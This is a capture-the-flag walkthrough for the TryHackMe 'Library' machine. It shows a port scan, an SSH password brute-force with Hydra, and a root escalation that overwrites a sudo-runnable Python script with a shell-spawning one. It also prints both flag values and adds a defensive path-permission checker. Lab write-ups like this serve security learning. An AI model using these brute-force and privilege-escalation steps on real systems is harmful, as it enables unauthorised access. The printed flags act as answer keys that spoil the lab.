Library - TryHackMe Walkthrough
Santosh Kumar
Cyber Security Enthusiast || CEHv12 || CTF Player || Security Researchers || TryHackMe Top 1% || Programming C, Python || Bug Bounty ||
Scan the machine:
We first find the list of services that are running on the machine. We use the below Rustscan command to get the services along with versions of these services.
rustscan -a 10.10.54.138 -- -A
There are two services, SSH and Apache web server, running on ports 22 and 80.
Enumerate web server:
Accessing port 80 in a browser shows us the following webpage. We notice a possible username, 'meliodas', mentioned on the webpage.
We employed Hydra for SSH brute-forcing using the username meliodas and rockyou.txt as the wordlist, successfully uncovering a valid password.
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://10.10.54.138
Gain initial access:
After using the discovered password to log into the machine, we located the user.txt file in the user's home directory. Additionally, we observed an intriguing Python script in the same directory.
user.txt
Ans. 6d488cbb3f111d135722c33cb635f4ec
Exploit privilege escalation:
Check for SUID binaries, writable configuration files, running services with high privileges, etc.
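There is a file named bak.py that can be run as root, but it cannot be edited by the user meliodas. It sits in meliodas's home directory, though, and deleting or creating a file depends on write permission on the directory, not on the file itself.
So, let's delete it and create a new file with the same name.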
rm bak.py
touch bak.py
echo 'import pty;pty.spawn("/bin/bash")' > bak.py
sudo python /home/meliodas/bak.py
cd /root
cat root.txt
root.txt
Ans. e8c8c6c256c35515d1d344ee0488c617
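A defensive check for the misconfiguration used above, as an added example that is not part of the original walkthrough: it walks every path component of a script that sudo is allowed to run and reports any component a non-root user controls. The ownership and mode values in SAMPLE are constructed for illustration, and the function names are hypothetical.

```python
import os
import stat
from collections import namedtuple

# Constructed metadata for illustration (not read from the target box):
# bak.py is root-owned and read-only, but its parent directory belongs to uid 1000.
FakeStat = namedtuple("FakeStat", "st_uid st_mode")
SAMPLE = {
    "/": FakeStat(0, stat.S_IFDIR | 0o755),
    "/home": FakeStat(0, stat.S_IFDIR | 0o755),
    "/home/meliodas": FakeStat(1000, stat.S_IFDIR | 0o755),
    "/home/meliodas/bak.py": FakeStat(0, stat.S_IFREG | 0o644),
}


def ancestors(path):
    """Yield '/', then each directory down to the (absolute) path itself."""
    parts = [p for p in os.path.normpath(path).split("/") if p]
    current = "/"
    yield current
    for part in parts:
        current = os.path.join(current, part)
        yield current


def replaceable_by_non_root(path, stat_fn=os.lstat):
    """Return (component, reason) pairs that let a non-root user swap `path`."""
    findings = []
    for component in ancestors(path):
        st = stat_fn(component)
        is_dir = stat.S_ISDIR(st.st_mode)
        sticky = bool(st.st_mode & stat.S_ISVTX)
        if st.st_uid != 0:
            # The owner of a directory can delete and recreate its entries.
            findings.append((component, "owned by uid %d" % st.st_uid))
        elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH) and not (is_dir and sticky):
            # Conservative: any group/other write bit is flagged.
            findings.append((component, "group/other writable"))
    return findings


if __name__ == "__main__":
    for component, reason in replaceable_by_non_root(
            "/home/meliodas/bak.py", SAMPLE.__getitem__):
        print(component, "->", reason)
```

Run against the real filesystem by omitting the second argument; an empty result means every component of the path is root-owned and not writable by group or others.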
Thanks for reading.